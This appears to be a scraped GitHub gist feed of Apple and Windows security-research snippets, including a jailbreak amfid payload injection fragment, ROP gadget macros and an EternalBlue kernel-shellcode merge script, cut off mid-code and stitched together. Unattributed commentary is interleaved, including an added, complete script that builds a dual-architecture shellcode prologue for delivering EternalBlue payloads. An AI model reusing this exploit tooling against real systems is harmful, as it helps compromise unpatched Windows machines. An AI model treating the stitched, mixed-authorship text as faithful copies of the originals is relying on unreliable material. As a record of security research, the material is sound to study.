jmpews (AKA zz)
@imbushuo
imbushuo / simplevm.c
Last active July 27, 2024 09:44
Demonstrates Hypervisor.Framework usage in Apple Silicon
// simplevm.c: demonstrates Hypervisor.Framework usage in Apple Silicon
// Based on the work by @zhuowei
// @imbushuo - Nov 2020
// To build:
// Prepare the entitlement with BOTH com.apple.security.hypervisor and com.apple.vm.networking WHEN SIP IS OFF
// Prepare the entitlement com.apple.security.hypervisor and NO com.apple.vm.networking WHEN SIP IS ON
// ^ Per @never_released, tested on 11.0.1, idk why
// clang -o simplevm -O2 -framework Hypervisor -mmacosx-version-min=11.0 simplevm.c
// codesign --entitlements simplevm.entitlements --force -s - simplevm
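The `simplevm.entitlements` file that the `codesign` line above consumes is not part of the excerpt. What follows is an added example of its contents, a config fragment written here rather than imbushuo's own file, built from the two variants the build comments describe: with SIP off both keys are present; with SIP on the `com.apple.vm.networking` pair is removed. A plausible reason for the difference, which the gist itself does not state, is that `com.apple.vm.networking` is a restricted entitlement that AMFI does not honour on an ad-hoc signature unless SIP is disabled.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <!-- needed in both variants: grants access to Hypervisor.framework -->
    <key>com.apple.security.hypervisor</key>
    <true/>
    <!-- SIP-off variant only: delete this key/value pair when SIP is on -->
    <key>com.apple.vm.networking</key>
    <true/>
</dict>
</plist>
```

After signing, `codesign -d --entitlements :- simplevm` prints the entitlements actually embedded in the binary, which is the quickest way to confirm the right variant went in before `hv_vm_create` is called.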
@PsychoTea
PsychoTea / amfid.c
Created February 18, 2019 01:23
amfid_payload w/ task_for_pid-allow patch
{
    COPY_RESOURCE("amfid_payload.dylib", "/jb/amfid_payload.dylib");
    inject_trust("/jb/amfid_payload.dylib");

    uint32_t amfid_pid = get_pid_for_name("amfid");

    uint64_t osbool_val = rk64(offs.data.osboolean_true + kernel_slide);
    VAL_CHECK(osbool_val);
@knightsc
knightsc / build-xnu-4903.221.2.sh
Last active August 25, 2019 12:07
A script to build XNU version 4903.221.2 (macOS Mojave 10.14.1).
#! /bin/bash
#
# build-xnu-4903.221.2.sh
# Scott Knight
#
# Based on the script by Brandon Azad
# https://gist.github.com/bazad/654959120a423b226dc564073b435453
#
# A script showing how to build XNU version 4903.221.2 on macOS Mojave
# 10.14 with Xcode 10.1.
@stefanesser
stefanesser / BHEU.markdown
Last active July 8, 2024 08:41
BlackHat EU - Wrong information in Talk "Eternal War in XNU Kernel Objects"

It has come to my attention that BlackHat EU had talks from Alibaba Security about iOS security topics. It seems to be from the same people who have previously presented at DEFCON. Back then I publicly discussed how their talk is basically just a summary of other people's work that is heavily miscredited to the wrong people.

Considering this history it is surprising that BlackHat would allow the same people to give a talk again on iOS security topics. But I gave up on the BlackHat review board and their decisions a long time ago, which is one of the reasons why I stopped submitting to them years ago.

But I am digressing from the actual reason for this GIST. And no, it is not about the fact that the talk once again starts with summarizing other people's work and crediting the wrong parties for the work done. In this GIST I want to go over one of the slides from the "summary part" of the talk, because not a single item on that slide is correct information.

So here is the offending slide:


#include <stdio.h>
#include <stdlib.h>

#define L(x) ((x) / 8)

#define GADGET(name, insns) \
    extern int name[]; \
    __asm(".globl _" #name "\n" \
          ".p2align 2\n" \
          "_" #name ":\n" \
@argp
argp / 11.4-vs-12.0b2-sb-operations.diff
Created June 26, 2018 10:37
iOS 11.4 vs 12.0b2 sandbox kext operations
--- operations-iOS-11.4-15F79.txt 2018-06-26 13:30:06.556874870 +0300
+++ operations-iOS-12.0-b2-16A5308e.txt 2018-06-26 13:30:06.556874870 +0300
@@ -5,6 +5,7 @@
[xxx] operation: device*
[xxx] operation: device-camera
[xxx] operation: device-microphone
+[xxx] operation: darwin-notification-post
[xxx] operation: distributed-notification-post
[xxx] operation: dynamic-code-generation
[xxx] operation: file*
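Review bot: The `[xxx]` placeholder on every line hides the one thing this insertion changes for everything that follows it: darwin-notification-post is added mid-list, between device-microphone and distributed-notification-post, so each later operation's numeric index shifts by one. Tooling that maps operation names to indices (profile compilers and decompilers) cares about that shift as much as about the new name, so keep the real indices in both listings (or say in the description that only names were diffed), so a reader can tell a renumbered operation from a new one.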

Thoughts on jailbreak detection

The controversy of jailbreak detection has been brought up multiple times in my Twitter feed, so in order not to have to repeat myself, I'll write my thoughts down here.
One day I'll hopefully get round to setting up a realistic blog and then I'll move this there, but for now I'll just dump it here on GitHub.

Motivation

Hi. I'm Siguza, and among other things I write exploits for a hobby and help make jailbreaks. One of the reasons I do that is because I believe we should have the ability to run whatever we want on our iDevices, just as we do with laptops and desktop computers. Now, a lot of app developers, however, seem to despise jailbreaks, and try to make their apps refuse service on jailbroken devices. I think that firstly sucks big time, and secondly always misses the point. From what I gathered, the two arguments for using jailbreak detection seem to be:

  • "J
@worawit
worawit / eternalblue_merge_shellcode.py
Last active April 3, 2024 12:25
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack

if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()

sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
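The excerpt stops after reading the two payloads, so it does not show how a single blob can serve both architectures. The following is an added example, written here and not taken from worawit's script or the MS17-010 repository, of the classic prologue used for that purpose: `0x40` decodes as `inc eax` in 32-bit mode but as a bare REX prefix in 64-bit mode (where `40 90` is still a NOP), so after `xor eax, eax` the register is 1 on x86 and 0 on x64 and a `jz` selects the payload. The stub layout, the rel8/rel32 choice and the `entry_offset` emulator are this example's own assumptions, not a description of the original merge format.

```python
import struct

# Mode-detection prologue (constructed for this example).
DETECT = bytes([
    0x31, 0xC0,  # xor eax, eax
    0x40,        # inc eax on x86; a REX prefix on x64, where "40 90" is a NOP
    0x90,        # nop
    0x85, 0xC0,  # test eax, eax  -> ZF=1 only in 64-bit mode
])


def merge_shellcode(sc_x86: bytes, sc_x64: bytes) -> bytes:
    """Return one blob: detection stub, then the x86 payload, then the x64 payload.

    Execution falls through into the x86 payload when eax == 1.  When eax == 0
    (64-bit mode) the jz skips exactly len(sc_x86) bytes and lands on the x64
    payload.  A short jz (rel8) is used when the x86 payload fits in 127 bytes,
    otherwise a near jz (0F 84 rel32); real kernel shellcode always needs rel32.
    """
    if len(sc_x86) <= 0x7F:
        jump = bytes([0x74, len(sc_x86)])                     # jz rel8
    else:
        jump = b"\x0f\x84" + struct.pack("<i", len(sc_x86))  # jz rel32
    return DETECT + jump + sc_x86 + sc_x64


def entry_offset(blob: bytes, is_64bit: bool) -> int:
    """Emulate the stub and return the offset execution reaches in the given mode.

    This is a check on the merge, not an emulator for the payloads themselves:
    it only models xor/inc-or-REX/nop/test/jz and the displacement arithmetic.
    """
    if blob[:6] != DETECT:
        raise ValueError("blob does not start with the detection stub")
    eax = 0 if is_64bit else 1          # the REX-vs-inc ambiguity decides this
    if blob[6] == 0x74:                 # jz rel8: displacement from end of jump
        end, disp = 8, blob[7]
    elif blob[6:8] == b"\x0f\x84":      # jz rel32
        end, disp = 12, struct.unpack("<i", blob[8:12])[0]
    else:
        raise ValueError("unexpected jump encoding at offset 6")
    return end + disp if eax == 0 else end


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} sc_x86 sc_x64 sc_out")
        sys.exit(1)
    with open(sys.argv[1], "rb") as f:
        x86 = f.read()
    with open(sys.argv[2], "rb") as f:
        x64 = f.read()
    merged = merge_shellcode(x86, x64)
    with open(sys.argv[3], "wb") as f:
        f.write(merged)
    print(f"x86 entry at {entry_offset(merged, False)}, "
          f"x64 entry at {entry_offset(merged, True)}, {len(merged)} bytes total")
```

The only invariant worth protecting is that the x86 payload never falls through into the x64 bytes, which holds as long as the x86 shellcode ends by returning or transferring control elsewhere; the emulator above lets a build script assert both entry offsets before the blob is ever sent over SMB.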
@yrp604
yrp604 / xnu-syscall-life-amd64.md
Last active October 2, 2023 15:59
The life of an XNU unix syscall on amd64

XNU syscall path

Chart

             +------------------+
             |These push their  |                                  +-----------------------+
             |respective syscall|                                  |This overwrites the    |
             |dispatch functions|                                  |saved dispatch function|
             |onto the stack    |                                  |with hndl_alltraps     |
@oleavr
oleavr / frida-core-1.0.vapi
Last active January 20, 2024 03:15
The frida-core API consumed by bindings like frida-python, frida-qml, etc.
[CCode (cheader_filename = "frida-core.h", cprefix = "Frida", lower_case_cprefix = "frida_")]
namespace Frida {
	public static void init ();
	public static void shutdown ();
	public static void deinit ();
	public static unowned GLib.MainContext get_main_context ();

	public class DeviceManager : GLib.Object {
		public DeviceManager ();